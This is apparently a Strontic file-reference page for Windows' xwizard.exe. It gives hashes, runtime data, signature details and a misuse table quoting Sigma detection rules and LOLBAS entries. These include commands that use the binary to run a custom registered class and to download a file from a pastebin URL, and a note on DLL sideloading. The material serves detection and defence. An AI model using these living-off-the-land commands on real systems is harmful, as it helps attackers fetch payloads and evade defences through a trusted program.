xwizard.exe

  • File Path: C:\Windows\SysWOW64\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 759CF84292251AB50E1791CBC0C4E8C5
SHA1 A84C351137B8DC905CE737E8154DBD5D5BE4502D
SHA256 5CE0B07DBC12F4F9263376047A7A2F269958DF61E1510AC3B817796410CC2B00
SHA384 99B1F1E16E2F3EFF43D8199F67856F54812DCF879E0603F718103C2009D2DF44615B898A26ECE0DF36B0B3BC9D11F20B
SHA512 5B3E21D3EC0AC145AEEBE03911D7673CAEEBE6D51BA14C5CEA8E41A69738D1D4B5CDB8ECEAEDD987E2AEDE69C537DF0E78CD5A34A84D586914BB794D9CA79833
SSDEEP 1536:HdR9GlZLXAKaDiTThDURDoq4OZZZLlCIibT:9R9GlZLcDi3hoRD68wbT
IMP 878B18532266618387DC445E265148DD
PESHA1 826B0F962B039B5A32E01D8F061F72F05CC93CD9
PE256 43DA55D1F2997B0D9FF4231173DCA39263A5DD70A93F5A05C2B2D4DF1F2A939E

Runtime Data

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\imageres.dll.mui File
(R-D) C:\Windows\SysWOW64\en-US\xwizard.exe.mui File
(RW-) C:\Users\user File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_261b62a767ca4e6d File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme2131664586 Section
\Windows\Theme966197582 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\xwizard.exe

Signature

  • Status: Signature verified.
  • Serial: 33000001C422B2F79B793DACB20000000001C4
  • Thumbprint: AE9C1AE54763822EEC42474983D8B635116C8452
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.17763.1 (WinBuild.160101.0800)
  • Product Version: 10.0.17763.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/70
  • VirusTotal Link: https://www.virustotal.com/gui/file/5ce0b07dbc12f4f9263376047a7a2f269958df61e1510ac3b817796410cc2b00/detection/

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 52
C:\WINDOWS\system32\ComputerDefaults.exe 47
C:\WINDOWS\system32\ComputerDefaults.exe 58
C:\Windows\system32\ComputerDefaults.exe 49
C:\windows\system32\ComputerDefaults.exe 63
C:\Windows\system32\ComputerDefaults.exe 49
C:\Windows\system32\xwizard.exe 54
C:\windows\system32\xwizard.exe 54
C:\Windows\system32\xwizard.exe 46
C:\WINDOWS\system32\xwizard.exe 49
C:\WINDOWS\system32\xwizard.exe 50
C:\Windows\system32\xwizard.exe 57
C:\windows\SysWOW64\ComputerDefaults.exe 57
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 47
C:\Windows\SysWOW64\ComputerDefaults.exe 60
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 40
C:\Windows\SysWOW64\ComputerDefaults.exe 55
C:\Windows\SysWOW64\ComputerDefaults.exe 49
C:\WINDOWS\SysWOW64\xwizard.exe 65
C:\Windows\SysWOW64\xwizard.exe 63
C:\windows\SysWOW64\xwizard.exe 54
C:\Windows\SysWOW64\xwizard.exe 58
C:\WINDOWS\SysWOW64\xwizard.exe 69

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.